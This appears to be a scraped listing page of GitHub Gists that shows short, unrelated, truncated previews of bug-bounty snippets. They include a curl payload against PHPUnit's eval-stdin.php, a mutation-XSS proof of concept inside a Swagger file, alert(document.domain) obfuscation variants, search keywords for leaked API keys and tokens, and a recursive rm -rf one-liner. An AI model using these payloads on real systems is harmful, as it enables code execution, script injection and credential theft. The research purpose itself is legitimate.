This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 | |
00 | |
01 | |
02 | |
03 | |
1 | |
1.0 | |
10 | |
100 | |
1000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | |
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Written by Frans Rosén (twitter.com/fransrosen) | |
_debug="$2" #turn on debug | |
_timeout="20" | |
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
_aws_key="AKIA..." | |
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
title: Classic API Resource Documentation | |
description: | | |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log('XSS-PoC-by-@yassineaboukir') src=1>"></form> | |
version: production | |
basePath: /JSSResource/ | |
produces: | |
- application/xml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
( find . -type d -name ".git" \ | |
&& find . -name ".gitignore" \ | |
&& find . -name ".gitmodules" ) | xargs rm -rf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
abuse | |
admin | |
administrator | |
ftp | |
hostmaster | |
info | |
is | |
it | |
list | |
list-request |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
“Hackme.tld” API_key | |
“Hackme.tld” secret_key | |
“Hackme.tld” aws_key | |
“Hackme.tld” Password | |
“Hackme.tld” FTP | |
“Hackme.tld” login | |
“Hackme.tld” github_token | |
“Hackme.tld” http:// & https:// | |
“Hackme.tld” amazonaws | |
“Hackme.tld” digitaloceanspaces |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Open terminal and install asar node module globally | |
$ npm install -g asar | |
# Go into the app’s directory, in our case it’s Slack | |
$ cd /Applications/Slack.app/Contents/Resources | |
# Create a directory to paste the content of app |
NewerOlder